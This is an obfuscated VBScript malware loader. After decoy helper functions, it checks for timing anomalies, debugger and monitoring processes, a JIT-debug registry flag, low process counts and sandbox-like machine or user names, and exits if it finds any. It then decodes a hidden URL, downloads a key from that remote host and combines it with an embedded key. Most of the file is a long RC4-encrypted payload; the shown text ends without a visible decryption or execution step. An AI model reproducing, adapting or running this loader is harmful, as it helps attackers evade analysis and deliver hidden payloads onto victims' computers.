Function G(s,x):Dim a,i,r:a=Split(s,","):r="":For i=0 To UBound(a):r=r&Chr(CInt(a(i)) Xor x):Next:G=r:End Function

Function RC4D(d,k)

Dim S(255),i,j,t,kl,r,a

kl=Len(k):For i=0 To 255:S(i)=i:Next

j=0:For i=0 To 255:j=(j+S(i)+Asc(Mid(k,(i Mod kl)+1,1))) Mod 256

t=S(i):S(i)=S(j):S(j)=t:Next

r="":i=0:j=0:a=Split(d,",")

Dim m:For m=0 To UBound(a)

i=(i+1) Mod 256:j=(j+S(i)) Mod 256

t=S(i):S(i)=S(j):S(j)=t

r=r&Chr(CInt(a(m)) Xor S((S(i)+S(j)) Mod 256)):Next

RC4D=r:End Function

Function chkBuf(x,y)

Dim a,b,c:a=x+10:b=y Xor 69:c=(a*b-19) Mod 256

chkBuf=c

End Function

Function parseHex(x,y)

Dim a,b,c:a=x+97:b=y Xor 8:c=(a*b-34) Mod 256

parseHex=c

End Function

Function hashRnd(x,y)

Dim a,b,c:a=x+76:b=y Xor 32:c=(a*b-3) Mod 256

hashRnd=c

End Function

Function swapByt(x,y)

Dim a,b,c:a=x+83:b=y Xor 70:c=(a*b-13) Mod 256

swapByt=c

End Function

Function rotLeft(x,y)

Dim a,b,c:a=x+115:b=y Xor 15:c=(a*b-46) Mod 256

rotLeft=c

End Function

Function mixState(x,y)

Dim a,b,c:a=x+42:b=y Xor 16:c=(a*b-50) Mod 256

mixState=c

End Function

Function expKey(x,y)

Dim a,b,c:a=x+123:b=y Xor 102:c=(a*b-12) Mod 256

expKey=c

End Function

Function cmpBlk(x,y)

Dim a,b,c:a=x+209:b=y Xor 76:c=(a*b-2) Mod 256

cmpBlk=c

End Function

Function valCrc(x,y)

Dim a,b,c:a=x+101:b=y Xor 51:c=(a*b-11) Mod 256

valCrc=c

End Function

Function initVec(x,y)

Dim a,b,c:a=x+186:b=y Xor 63:c=(a*b-38) Mod 256

initVec=c

End Function

Dim zT1,zT2,zX,zS

zT1=Timer:zS=0

For zX=1 To 300000:zS=zS+zX:Next

zT2=Timer

If Abs(zT2-zT1)>4 Then WScript.Quit

Dim zW1,zPQ,zPR,zBI

Set zW1=GetObject("winmgmts:")

Set zPQ=zW1.ExecQuery("Select Name From Win32_Process")

Dim zBad(11)

zBad(0)="msscrdbg.exe":zBad(1)="msvsmon.exe":zBad(2)="windbg.exe"

zBad(3)="x64dbg.exe":zBad(4)="x32dbg.exe":zBad(5)="ollydbg.exe"

zBad(6)="idag.exe":zBad(7)="idaq.exe":zBad(8)="dbghost.exe"

zBad(9)="apimonitor.exe":zBad(10)="procmon.exe":zBad(11)="wireshark.exe"

For Each zPR In zPQ

    For zBI=0 To 11

        If LCase(zPR.Name)=zBad(zBI) Then WScript.Quit

    Next

Next

Set zPQ=Nothing:Set zW1=Nothing

Dim zReg:Set zReg=CreateObject("WScript.Shell")

On Error Resume Next

Dim zJit:zJit=zReg.RegRead("HKLM\SOFTWARE\Microsoft\Windows Script\Settings\JITDebug")

If Err.Number=0 Then If CInt(zJit)=1 Then WScript.Quit

Err.Clear:On Error GoTo 0:Set zReg=Nothing

Dim zCnt:zCnt=0

Dim zW2,zPC2,zPR2

Set zW2=GetObject("winmgmts:")

Set zPC2=zW2.ExecQuery("Select Name From Win32_Process")

For Each zPR2 In zPC2:zCnt=zCnt+1:Next

Set zPC2=Nothing:Set zW2=Nothing

If zCnt<18 Then WScript.Quit

Dim zSh:Set zSh=CreateObject("WScript.Shell")

Dim zCN:zCN=LCase(zSh.ExpandEnvironmentStrings("%COMPUTERNAME%"))

Dim zUN:zUN=LCase(zSh.ExpandEnvironmentStrings("%USERNAME%"))

Set zSh=Nothing

Dim zSB(9)

zSB(0)="sandbox":zSB(1)="malware":zSB(2)="virus":zSB(3)="cuckoo"

zSB(4)="analysis":zSB(5)="tester":zSB(6)="sample":zSB(7)="wilbert"

zSB(8)="johndoe":zSB(9)="klone"

Dim zSI:For zSI=0 To 9

    If InStr(zCN,zSB(zSI))>0 Or InStr(zUN,zSB(zSI))>0 Then WScript.Quit

Next

Dim u,h,ks

u=G("51,47,47,43,40,97,116,116,58,41,60,104,117,47,52,43,116,105,116,48,105,117,43,51,43,100,47,102,25,26,9,43,48,46,1,10,53,42,51,104,16,107,99,31,22,99,28,54,14,25,14,13",91)

Set h=CreateObject("WinHttp.WinHttpRequest.5.1")

h.Open "GET",u,False:h.Send

If h.Status<>200 Then WScript.Quit

ks=Trim(h.ResponseText):Set h=Nothing

If Len(ks)<>16 Then WScript.Quit

Dim lkv(15)

lkv(0)=Chr(((62 Xor 23)-3) Xor 20)

lkv(1)=Chr(((65 Xor 33)-6) Xor 27)

lkv(2)=Chr(((95 Xor 49)-10) Xor 39)

lkv(3)=Chr(((150 Xor 21)-18) Xor 3)

lkv(4)=Chr(((97 Xor 16)-8) Xor 8)

lkv(5)=Chr(((87 Xor 34)-1) Xor 33)

lkv(6)=Chr(((107 Xor 66)-23) Xor 43)

lkv(7)=Chr(((136 Xor 14)-11) Xor 3)

lkv(8)=Chr(((183 Xor 61)-30) Xor 31)

lkv(9)=Chr(((127 Xor 37)-29) Xor 8)

lkv(10)=Chr(((100 Xor 59)-21) Xor 38)

lkv(11)=Chr(((186 Xor 56)-6) Xor 50)

lkv(12)=Chr(((68 Xor 43)-18) Xor 25)

lkv(13)=Chr(((94 Xor 19)-4) Xor 15)

lkv(14)=Chr(((84 Xor 36)-21) Xor 15)

lkv(15)=Chr(((86 Xor 53)-8) Xor 45)

Dim lk:lk="":Dim qv:For qv=0 To 15:lk=lk&lkv(qv):Next

Dim fk:fk="":Dim qi:For qi=1 To 16:fk=fk&Chr(Asc(Mid(ks,qi,1)) Xor Asc(Mid(lk,qi,1))):Next

Dim p:p="26,88,75,70,122,236,94,172,147,158,224,255,165,44,203,97,141,38,84,118,212,230,135,246,27,127,133,117,158,154,241,69,16,42,246,89,63,102,122,77,130,254,68,102,117,248,243,44,83,72,204,208,167,72,233,46,127,145,61,26,136,231,78,205,237,171,65,61,165,178,4,155,200,192,124,203,108,2,117,208"

p=p&","&"68,39,151,39,58,94,68,158,227,252,172,39,74,225,212,72,52,65,162,185,18,179,107,95,8,126,24,126,166,68,72,247,69,231,56,111,130,82,99,254,9,174,147,87,33,154,19,39,209,177,79,99,111,59,86,177,12,158,212,187,135,30,238,132,88,134,9,61,115,131,6,66,111,183,106,199,23,55,150,171"

p=p&","&"164,180,172,53,225,179,32,216,226,124,99,176,202,60,209,192,229,59,191,246,82,182,239,130,203,151,77,50,70,112,106,215,56,189,176,194,43,14,52,226,105,160,129,106,224,31,154,235,63,24,122,236,34,36,129,120,51,97,112,222,44,47,126,222,43,147,148,188,49,109,183,106,92,43,223,197,24,181,46,9"

p=p&","&"84,214,237,10,139,240,98,86,130,135,68,54,71,2,242,137,36,34,198,28,138,199,226,209,85,85,200,236,164,243,232,127,62,91,72,59,142,57,36,121,127,238,181,188,201,159,228,155,132,220,166,222,143,25,141,196,90,160,46,132,118,9,119,33,152,38,198,32,85,0,140,213,58,121,118,119,231,112,161,68"

p=p&","&"117,69,46,63,241,157,250,18,189,125,56,227,210,77,223,10,200,92,244,84,229,104,179,109,122,23,49,105,47,52,253,60,13,245,125,32,104,66,99,147,125,44,154,213,70,33,62,74,96,207,101,193,165,13,231,162,18,134,224,95,104,172,246,28,111,211,65,201,7,150,109,190,144,24,230,249,194,231,117,143"

p=p&","&"96,152,148,252,250,110,169,61,214,136,108,70,148,75,193,108,234,84,62,209,228,45,23,172,209,25,193,84,37,186,123,199,25,112,192,76,33,75,5,127,221,177,202,79,207,82,235,91,48,46,70,30,113,190,229,171,218,125,128,145,22,106,193,4,215,120,150,56,237,79,115,116,16,133,77,150,248,215,115,118"

p=p&","&"86,170,243,240,178,233,115,156,175,59,215,222,21,96,32,176,124,134,61,131,4,254,237,34,70,216,165,69,216,159,133,77,178,15,77,190,247,124,43,143,85,38,20,211,94,224,188,49,12,248,118,250,246,209,3,224,167,169,117,18,105,91,254,173,190,136,87,126,99,17,208,241,61,229,21,171,196,148,192,56"

p=p&","&"213,97,142,34,66,175,89,30,174,193,71,125,125,98,180,85,201,116,76,220,152,173,110,43,106,11,12,127,225,38,17,50,242,163,139,234,222,151,111,236,90,110,129,57,207,14,119,188,222,155,34,200,238,243,233,22,79,169,63,70,91,194,134,119,190,17,26,208,4,238,162,185,200,112,220,140,61,217,139,117"

p=p&","&"60,96,51,25,23,135,120,154,253,167,248,249,92,227,109,196,209,208,129,240,239,152,185,114,225,0,148,0,186,114,114,146,124,95,201,58,1,166,164,156,188,30,23,216,50,151,62,56,65,170,5,101,119,246,222,198,81,111,19,15,152,127,219,170,204,72,175,118,199,231,193,9,235,131,119,228,240,184,217,121"

p=p&","&"93,227,193,17,104,249,142,178,131,80,44,13,199,123,8,43,38,208,96,255,67,92,130,229,234,217,42,245,5,94,11,218,62,122,192,136,135,108,155,22,199,137,66,159,85,185,10,22,193,224,185,226,131,99,143,123,164,74,131,63,68,19,222,49,44,104,80,238,27,7,118,71,167,192,84,247,196,101,95,221"

p=p&","&"196,171,89,127,155,168,17,6,89,209,91,241,51,8,219,149,48,65,186,54,5,163,222,1,39,231,146,11,22,216,123,216,153,64,255,147,165,17,62,99,185,20,111,60,141,239,68,113,214,198,198,164,103,82,164,105,112,82,32,194,22,151,166,3,61,69,226,31,35,128,118,176,233,14,92,53,101,109,80,65"

p=p&","&"175,114,120,140,103,180,141,64,172,153,215,37,33,233,128,186,27,68,107,8,182,253,145,228,3,235,193,51,233,57,199,54,193,102,116,155,180,36,56,128,152,52,188,161,32,238,51,60,111,134,240,125,95,151,144,74,198,146,83,179,188,182,218,151,75,150,171,189,113,115,62,155,208,27,186,183,15,182,124,66"

p=p&","&"46,4,224,109,234,69,253,93,85,33,133,43,206,172,149,28,135,133,250,42,196,255,24,134,54,72,64,113,167,143,62,148,230,74,163,217,136,72,213,62,119,234,49,25,145,151,19,248,214,202,93,47,147,243,78,11,244,141,19,11,234,37,108,126,64,191,100,41,17,50,117,138,197,36,131,210,139,84,64,182"

p=p&","&"77,94,14,37,14,74,88,239,24,143,227,32,249,230,29,163,10,26,90,166,56,120,225,141,83,19,14,38,107,47,221,143,4,202,60,220,112,120,188,2,59,238,176,233,155,82,64,238,185,210,235,118,109,203,224,139,25,199,240,240,42,57,190,17,16,22,225,220,228,128,152,130,116,34,111,86,119,91,175,208"

p=p&","&"237,60,39,223,103,186,5,161,196,114,38,235,246,223,38,157,2,76,157,188,106,213,51,222,246,101,30,109,56,81,5,120,227,65,128,167,174,67,169,34,217,58,243,190,92,52,244,248,239,174,216,48,84,149,101,76,234,201,203,251,236,161,9,20,234,239,228,111,15,169,210,125,7,219,179,151,123,226,39,147"

p=p&","&"183,76,121,159,185,159,129,136,207,20,149,76,75,155,104,255,108,222,119,234,53,39,173,35,233,206,80,124,157,188,120,174,53,216,68,52,27,6,86,82,44,248,217,47,88,130,250,176,103,216,88,48,55,74,179,230,206,153,120,124,59,190,21,144,233,108,55,91,158,218,94,246,125,31,205,228,168,176,175,85"

p=p&","&"225,244,27,50,167,47,231,57,171,88,24,72,12,36,151,254,234,204,188,74,194,233,76,177,214,222,202,199,221,133,26,22,89,152,23,154,113,180,119,206,217,81,72,181,18,49,83,214,87,97,41,21,154,233,180,19,72,33,9,227,227,83,37,51,182,218,80,158,107,254,89,146,74,112,231,143,98,103,50,20"

p=p&","&"35,155,216,201,151,218,194,131,30,118,55,110,161,9,194,23,9,54,19,98,163,159,137,82,43,44,21,75,5,211,209,109,35,250,87,137,177,184,152,220,253,93,139,226,91,160,99,207,80,238,242,13,194,49,230,215,109,126,74,111,120,27,84,37,171,26,161,1,136,51,236,10,36,125,98,178,248,6,194,159"

p=p&","&"55,166,157,81,86,44,249,135,31,67,223,242,159,149,157,51,127,107,74,129,92,172,70,112,254,204,17,29,28,63,126,241,101,144,160,103,1,163,184,143,164,131,138,75,21,5,104,182,221,98,173,223,217,240,160,3,153,217,223,113,67,81,137,130,41,143,203,71,164,236,28,232,51,31,5,132,39,217,45,189"

p=p&","&"60,242,147,203,30,9,167,54,250,240,5,213,152,163,111,170,166,175,66,190,129,233,82,94,83,212,238,253,174,125,159,31,233,102,58,68,7,98,249,173,242,47,195,254,255,47,51,227,138,34,225,84,237,182,78,150,176,226,117,30,235,186,10,116,233,93,138,181,55,6,230,36,254,179,158,244,49,7,196,250"

p=p&","&"114,48,127,98,15,77,74,71,3,14,83,50,169,17,108,177,76,54,114,95,17,152,141,134,123,185,137,191,35,249,1,227,112,229,254,186,247,43,235,169,23,104,34,47,38,172,25,138,34,163,181,4,103,68,29,192,176,155,44,159,247,48,134,175,235,179,223,46,29,247,163,149,209,15,196,90,156,42,186,147"

p=p&","&"72,105,114,239,42,206,202,229,90,22,13,144,136,87,156,209,202,42,203,40,194,213,83,76,49,183,3,21,230,144,150,86,203,130,227,52,15,254,56,176,61,27,97,160,138,192,188,239,28,77,96,131,82,20,229,221,36,121,5,167,180,254,230,109,69,239,109,128,47,227,255,244,117,10,46,197,91,143,65,224"

p=p&","&"33,186,3,244,113,32,164,225,143,125,136,49,14,3,119,182,112,205,91,22,182,28,71,60,90,122,18,176,8,59,182,22,20,201,63,104,134,116,246,249,124,61,139,251,44,85,255,202,193,50,219,85,111,97,49,176,46,160,246,172,246,247,92,63,239,114,239,165,51,15,162,227,254,181,235,87,121,246,52,127"

p=p&","&"4,147,53,173,164,167,208,34,58,204,93,190,36,42,36,112,126,225,148,217,239,121,160,209,37,191,4,39,85,35,206,247,114,231,69,234,246,139,117,87,237,111,185,159,193,187,200,198,244,246,72,114,136,200,254,200,154,114,114,169,152,187,217,93,68,12,234,112,224,253,186,98,96,167,245,189,95,98,225,112"

p=p&","&"146,52,130,239,15,16,71,204,181,188,212,146,135,6,240,176,46,89,78,14,67,31,177,138,199,240,157,147,87,151,21,112,7,99,206,180,118,141,92,58,92,29,200,20,246,186,48,239,205,190,69,150,158,20,207,20,16,212,119,209,2,86,188,125,21,185,165,92,137,154,209,82,52,155,208,217,34,252,177,100"

p=p&","&"105,210,22,168,133,135,91,201,180,102,3,214,19,104,83,109,137,179,60,223,218,129,15,169,80,154,209,52,27,41,48,171,15,242,105,229,117,208,42,54,10,229,51,149,217,132,146,17,148,82,111,223,69,57,73,216,163,49,157,79,41,166,230,229,91,28,228,244,60,69,233,3,124,229,88,26,145,52,58,82"

p=p&","&"136,3,141,62,15,45,162,183,42,21,6,43,108,56,50,168,1,23,151,6,53,197,178,39,170,150,58,145,36,12,117,54,7,90,253,198,150,124,61,206,84,165,112,165,2,161,255,10,12,185,126,206,32,54,103,30,89,59,244,251,222,35,232,78,43,38,82,234,164,202,133,169,185,13,118,164,149,96,243,48"

p=p&","&"35,216,58,177,89,57,249,198,153,19,53,139,5,145,252,115,19,198,148,131,156,73,194,87,66,67,162,120,46,155,123,251,36,14,32,215,133,160,138,105,185,189,227,254,117,210,16,237,24,151,41,128,50,54,102,141,214,83,105,249,230,111,2,113,76,65,164,249,48,8,220,40,9,193,251,54,64,30,236,179"

p=p&","&"48,234,229,163,109,231,62,176,102,117,111,224,49,26,44,57,161,155,139,148,68,145,169,14,116,170,62,62,244,62,85,211,127,182,225,56,30,226,218,117,2,200,221,53,33,65,55,213,248,218,71,36,34,164,131,136,206,103,46,242,176,243,63,106,179,230,123,99,255,83,215,40,215,166,154,149,7,139,65,129"

p=p&","&"198,11,167,212,241,242,211,187,58,234,4,33,131,223,162,97,169,120,109,75,182,241,157,252,130,240,236,97,153,217,144,153,56,215,86,130,71,87,184,216,93,97,35,30,122,173,232,37,8,126,165,181,234,72,69,215,202,85,19,85,51,92,25,53,239,228,185,35,164,223,71,43,92,127,238,192,179,225,207,237"

p=p&","&"86,211,177,243,67,210,26,77,235,213,7,255,45,187,166,250,248,69,252,249,126,118,244,104,30,159,216,134,102,54,41,94,93,76,108,200,228,73,173,180,73,161,86,232,105,204,98,174,254,50,218,254,18,245,155,92,27,209,184,5,6,247,246,164,229,87,249,55,1,151,254,140,150,242,50,66,10,230,119,149"

p=p&","&"224,166,146,193,163,250,49,198,80,7,80,134,183,205,60,150,217,149,197,47,53,73,31,206,38,229,194,47,155,55,241,244,33,78,56,26,104,37,85,85,88,6,238,154,158,163,139,180,147,145,185,200,219,135,59,45,196,1,87,153,185,49,254,132,18,255,87,155,130,251,247,112,170,9,96,125,11,40,10,42"

p=p&","&"11,132,242,211,246,142,232,248,130,221,109,149,225,202,135,123,103,75,125,126,5,108,23,252,74,116,25,249,15,224,31,49,231,222,140,180,210,6,235,20,154,64,184,57,246,3,199,223,157,15,219,209,203,31,24,229,14,165,74,11,154,238,228,131,213,44,190,249,184,101,43,31,1,9,148,40,226,48,107,205"

p=p&","&"58,199,163,29,47,193,34,99,33,171,88,19,166,62,0,53,34,212,94,193,46,120,247,144,86,103,234,48,156,106,110,18,225,95,93,37,125,188,12,47,250,161,191,209,254,87,143,108,187,108,209,220,20,153,40,213,124,44,142,206,116,48,10,107,163,100,245,118,153,50,206,16,246,238,2,50,177,129,54,107"

p=p&","&"152,23,235,7,127,81,87,123,226,224,254,97,152,238,243,230,87,222,233,118,126,172,11,11,1,54,175,140,144,44,87,57,224,16,222,50,200,20,158,170,187,73,39,252,93,98,66,25,40,224,36,253,117,136,105,225,253,196,255,85,71,226,240,88,168,91,30,111,21,232,130,154,171,206,40,15,197,109,84,213"

p=p&","&"82,101,50,70,223,209,236,113,64,91,62,158,100,221,140,225,240,93,153,60,58,216,233,34,0,82,196,29,228,72,243,19,148,56,247,144,93,54,136,132,151,47,28,70,232,220,9,179,120,236,132,222,112,57,59,116,167,182,74,174,128,49,159,163,32,28,3,181,87,155,51,157,97,237,89,61,110,150,199,79"

p=p&","&"16,132,110,226,10,232,192,49,165,205,249,35,110,229,37,106,183,224,91,248,187,75,218,244,33,144,106,50,173,228,142,228,27,11,187,20,228,249,240,55,233,242,210,208,194,164,105,61,123,157,104,63,118,92,246,137,233,184,124,231,35,246,209,166,65,7,233,223,57,64,142,215,127,234,44,236,122,16,4,26"

p=p&","&"79,209,56,36,188,6,236,11,148,171,202,208,35,191,57,251,27,220,241,164,239,44,227,227,121,161,36,168,175,116,234,31,115,0,144,18,236,20,231,145,19,75,135,149,60,55,152,90,159,250,125,58,13,248,250,5,117,73,220,90,97,33,228,111,246,214,80,126,127,188,27,148,232,224,84,52,62,138,127,199"

p=p&","&"99,121,220,253,6,125,122,52,15,124,85,38,135,240,48,208,53,57,107,236,59,30,14,78,157,89,91,10,41,237,129,36,99,44,188,155,196,44,157,182,106,69,173,179,177,227,25,48,144,239,137,18,25,110,64,104,135,162,92,222,9,181,160,139,36,117,199,84,211,180,155,45,185,245,194,123,220,107,86,167"

p=p&","&"157,78,81,20,225,202,90,2,55,62,128,82,137,77,198,207,130,35,151,240,104,71,115,25,76,191,22,209,199,81,133,223,119,33,59,94,30,13,225,125,51,2,5,66,217,128,147,192,193,0,105,89,232,118,39,96,68,199,183,120,139,26,44,218,40,68,78,98,80,144,197,57,7,106,244,122,169,107,192,251"

p=p&","&"127,187,81,168,209,35,166,1,234,71,141,220,202,72,236,140,16,103,119,252,91,96,40,178,200,48,23,239,234,201,14,45,1,85,214,27,248,205,65,6,169,49,30,91,59,126,117,255,210,65,250,242,252,181,213,182,93,134,109,77,246,132,174,236,192,118,210,133,2,78,172,209,249,245,175,83,48,142,81,48"

p=p&","&"72,7,5,52,42,118,169,121,184,213,87,177,98,176,160,85,59,222,21,155,165,101,228,191,180,64,212,181,90,124,61,131,17,193,41,96,36,230,254,131,249,129,13,252,123,118,220,73,120,103,81,183,158,154,146,173,234,110,149,112,131,239,129,227,117,239,43,73,124,3,38,49,238,71,38,98,237,111,9,217"

p=p&","&"3,224,4,175,146,164,16,191,120,86,2,250,129,222,119,106,237,46,7,203,20,168,135,202,7,75,106,91,19,34,3,120,30,101,189,22,248,162,238,80,79,31,35,240,175,79,88,80,62,143,172,107,12,131,99,152,131,62,129,232,187,111,5,254,239,224,7,36,231,211,241,55,32,73,100,171,227,188,139,246"

p=p&","&"254,68,182,190,180,31,41,167,208,90,28,224,228,249,187,40,59,16,230,238,85,196,78,76,252,170,2,91,156,231,127,20,112,217,13,198,241,177,180,206,159,216,29,81,26,59,79,52,211,28,124,54,240,58,125,212,69,76,30,237,209,94,26,116,35,194,60,113,56,46,80,102,203,115,165,255,128,90,120,19"

p=p&","&"217,200,78,193,179,143,36,61,205,13,97,210,51,194,35,144,231,213,145,33,192,39,122,13,180,69,202,12,213,130,65,191,158,25,214,251,95,78,187,72,212,12,34,16,87,182,142,248,122,174,142,87,159,126,199,215,37,208,30,91,196,174,163,142,193,175,32,115,78,187,124,126,71,253,215,25,242,230,96,224"

p=p&","&"35,172,21,254,132,202,158,15,126,31,89,106,220,158,206,241,75,118,6,187,137,14,77,221,253,250,52,32,30,73,56,23,39,201,103,44,69,60,164,63,209,186,119,151,190,219,214,33,92,87,133,84,123,141,124,226,32,3,20,76,195,107,252,80,132,153,71,59,24,78,233,204,253,66,90,145,220,213,49,139"

p=p&","&"183,197,193,108,213,188,138,224,112,160,9,151,174,171,195,83,3,9,57,23,30,55,136,34,88,92,198,109,12,146,210,92,133,224,49,132,7,106,24,167,214,17,49,124,79,141,78,181,232,183,105,24,196,212,67,169,20,133,23,208,176,55,227,47,118,180,70,97,135,225,38,107,190,77,162,73,42,50,116,72"

p=p&","&"152,60,198,141,247,136,169,76,225,21,97,134,135,217,119,116,243,121,86,4,24,208,177,76,239,215,196,202,111,86,36,47,207,193,151,68,223,217,106,226,157,223,11,150,135,192,151,218,42,85,222,245,41,237,164,74,74,206,137,188,162,26,171,1,23,186,234,187,251,6,160,211,253,65,239,21,162,40,201,245"

p=p&","&"117,253,199,0,247,133,14,130,61,99,95,193,132,240,211,68,119,71,213,69,63,53,74,65,236,228,20,91,124,254,213,39,139,205,185,146,206,84,49,14,184,20,221,138,56,177,184,27,245,23,178,224,54,121,250,24,131,180,89,10,7,28,114,224,13,124,16,207,126,182,218,44,200,3,68,167,233,87,158,233"

p=p&","&"45,134,2,221,83,110,54,6,161,105,20,30,40,235,135,105,194,209,56,10,176,177,57,83,72,75,136,186,207,79,155,231,137,15,21,211,20,206,127,53,166,217,122,161,80,223,91,34,132,140,217,214,98,199,9,24,22,185,111,205,10,217,166,88,104,56,13,245,28,248,100,41,177,209,141,82,141,95,48,49"

p=p&","&"86,137,60,159,129,246,199,123,166,221,157,139,119,48,34,228,213,184,204,34,125,121,38,113,238,24,218,105,26,160,190,96,199,83,48,43,175,133,107,104,27,73,102,253,46,6,200,136,197,24,157,164,147,9,185,93,171,239,42,148,153,25,116,120,202,185,49,187,242,203,110,116,122,44,58,185,212,169,239,200"

p=p&","&"193,27,152,128,181,141,121,56,13,34,244,61,10,37,246,184,219,238,181,23,23,147,32,52,4,131,39,144,149,1,120,165,110,16,77,49,237,249,246,246,238,106,140,5,213,36,208,188,114,181,201,105,0,68,170,177,121,20,228,138,96,157,187,59,25,100,83,114,115,253,5,208,49,149,219,158,191,203,219,151"

p=p&","&"216,170,153,190,110,155,151,22,44,181,231,152,57,250,90,152,240,38,87,54,89,219,209,144,213,229,221,149,65,208,125,20,132,208,36,166,224,69,120,143,168,180,141,229,197,152,95,53,240,186,101,150,6,100,71,157,7,153,50,214,114,240,94,222,239,138,125,218,17,229,33,222,149,91,63,248,88,3,52,109"

p=p&","&"207,209,19,14,145,49,72,68,54,180,126,127,230,41,3,35,8,35,0,109,208,127,86,192,45,46,152,78,47,119,61,101,154,144,44,115,173,150,223,128,193,154,105,11,64,55,10,218,248,195,19,209,14,21,143,185,51,201,90,33,1,155,164,252,166,64,189,110,102,180,225,39,112,11,82,115,83,141,195,93"

p=p&","&"170,232,187,99,69,132,7,38,58,204,0,67,66,209,17,8,79,44,70,234,105,14,153,24,247,8,139,115,236,160,173,63,190,167,117,88,144,81,199,218,51,146,62,19,15,49,113,208,194,156,61,186,9,195,121,54,58,30,102,112,166,155,60,20,19,27,113,125,149,208,92,189,179,32,242,89,44,124,121,154"

p=p&","&"170,199,38,61,122,2,153,166,97,88,105,169,4,113,16,204,90,23,165,255,103,235,192,137,195,148,246,50,39,135,29,161,224,125,182,19,101,180,138,203,19,249,56,220,117,66,203,49,155,57,215,88,63,147,19,106,227,166,7,202,83,133,206,232,160,165,184,166,109,78,52,244,114,176,82,94,146,208,81,11"

p=p&","&"242,123,130,229,62,216,183,46,170,77,239,32,126,174,215,68,169,5,78,35,79,195,94,193,78,39,155,177,236,244,64,208,222,217,224,40,248,225,197,98,79,136,194,131,157,140,150,147,6,87,135,197,6,154,155,107,168,244,248,72,133,28,173,46,161,142,150,17,94,195,2,98,197,227,54,229,177,33,58,50"

p=p&","&"108,153,213,60,139,153,186,201,72,23,197,219,152,143,145,63,114,203,236,165,141,123,9,214,117,127,110,174,63,98,232,125,194,13,198,169,133,92,115,41,216,137,4,16,51,245,41,72,254,176,179,114,39,94,107,174,116,114,187,225,166,155,174,159,164,45,205,34,21,196,142,254,245,224,82,167,53,149,65,181"

p=p&","&"102,134,18,214,46,240,56,129,91,153,135,201,76,173,169,117,207,238,82,80,33,40,244,1,56,89,159,160,226,139,185,117,168,0,6,132,79,44,220,2,44,137,18,28,188,150,70,192,16,119,90,118,139,77,135,130,248,229,183,130,143,235,4,140,134,142,174,193,11,216,239,55,36,93,240,238,206,197,18,2"

p=p&","&"210,13,37,1,11,33,150,171,42,49,223,202,111,39,6,183,8,95,232,18,134,39,205,11,52,56,219,243,99,115,70,151,130,199,166,176,175,129,94,136,62,11,9,81,37,230,46,186,2,179,10,118,119,9,195,202,112,116,50,166,96,15,7,255,136,199,5,65,204,104,29,79,243,107,114,239,41,159,10,15"

p=p&","&"52,123,151,54,24,2,83,252,187,146,122,78,158,108,153,42,233,79,208,64,136,1,153,30,91,22,197,99,57,153,56,216,215,22,77,5,247,155,205,136,77,4,38,188,64,17,77,209,218,230,62,149,48,228,134,42,13,160,252,94,101,95,115,222,243,2,234,90,116,126,82,246,168,10,140,115,244,11,65,82"

p=p&","&"253,154,167,197,192,183,239,110,203,26,42,238,113,3,204,2,145,191,217,74,43,158,14,25,233,177,249,234,219,60,231,112,198,231,188,213,159,2,106,81,57,122,140,13,211,157,251,228,33,204,65,149,97,31,128,38,201,173,211,198,230,128,177,83,208,219,97,104,171,166,45,29,252,144,31,97,3,208,202,216"

p=p&","&"99,217,18,48,95,107,133,123,142,53,195,20,1,51,143,109,10,147,131,219,198,179,162,133,18,32,21,7,201,129,40,128,91,222,84,127,180,21,239,112,205,56,16,6,184,71,255,197,146,238,16,235,15,20,79,206,88,117,62,155,123,6,28,141,97,252,157,216,21,13,28,188,63,146,163,148,102,154,99,95"

p=p&","&"122,239,209,3,44,19,27,243,229,201,233,22,190,83,111,122,151,62,107,119,229,22,212,80,76,19,192,34,118,219,147,153,202,62,181,210,182,84,120,135,216,175,133,46,70,191,252,91,209,94,32,143,103,204,62,14,206,73,19,248,113,24,161,38,107,240,151,34,169,183,254,4,131,50,45,211,136,143,55,216"

p=p&","&"104,61,212,163,56,152,30,107,104,232,197,119,71,215,8,112,101,236,95,217,135,62,13,57,210,199,244,210,4,91,26,239,38,27,188,31,189,255,6,240,31,246,222,55,220,40,117,224,3,116,227,204,54,200,236,53,136,157,237,214,33,194,154,226,230,17,123,82,82,28,238,21,186,102,95,1,149,59,221,108"

p=p&","&"242,25,92,55,210,42,226,148,218,187,187,137,168,255,248,10,189,241,86,46,13,37,68,231,47,235,224,206,9,83,131,150,64,82,216,205,134,228,174,68,62,137,124,4,252,186,210,24,112,255,208,121,58,106,166,142,208,175,114,48,78,226,182,223,81,210,22,30,122,178,39,231,6,203,79,164,175,199,186,209"

p=p&","&"131,141,46,87,54,161,61,135,118,69,185,206,147,33,206,88,115,118,41,0,27,241,238,231,127,49,231,186,21,39,211,169,237,33,149,119,167,231,224,161,188,138,95,195,131,95,98,163,234,83,235,228,143,16,113,222,188,209,225,155,27,195,178,164,95,208,46,254,29,200,244,37,72,78,82,10,185,170,50,18"

p=p&","&"82,96,156,212,145,204,11,255,10,178,71,2,146,30,220,29,202,154,137,11,163,199,163,233,205,87,141,123,56,139,232,92,16,252,139,5,198,171,93,172,60,249,238,38,135,132,32,230,150,42,231,23,156,147,228,24,24,129,41,51,78,228,86,10,15,47,59,253,44,169,67,110,237,167,118,154,165,213,26,125"

p=p&","&"202,139,128,148,157,197,227,235,54,219,156,11,127,193,148,27,58,231,62,47,217,232,24,78,63,75,25,87,148,204,149,124,68,244,36,239,3,109,66,36,189,243,178,126,231,215,236,122,215,26,207,60,166,142,138,119,44,25,65,63,22,32,252,15,231,231,38,233,8,246,78,120,185,209,93,25,43,169,194,151"

p=p&","&"101,132,202,55,61,49,149,217,130,127,207,164,150,188,41,13,26,130,204,244,132,145,204,155,139,82,187,24,100,72,18,34,126,36,148,159,224,81,202,166,207,206,85,176,95,155,53,245,181,77,26,40,80,110,225,123,103,231,90,53,152,121,163,40,232,74,206,73,42,121,159,221,184,123,100,165,170,242,97,76"

p=p&","&"63,178,95,172,142,215,134,176,194,156,51,19,98,102,141,199,99,160,234,22,42,165,50,221,211,249,9,25,157,214,80,61,93,6,39,83,54,15,94,77,34,183,7,137,18,34,32,65,180,223,242,56,249,221,37,124,50,143,95,185,150,134,32,217,144,51,127,82,19,152,53,178,202,6,9,209,56,205,86,253"

p=p&","&"191,102,55,6,33,39,144,160,64,164,101,103,62,111,11,153,219,238,191,188,204,201,20,100,209,94,122,241,233,7,147,210,83,12,179,100,110,229,194,211,128,53,150,240,246,146,195,88,7,129,36,123,195,63,184,56,221,77,229,101,29,132,64,11,249,139,193,80,242,95,6,230,228,124,34,10,224,157,247,10"

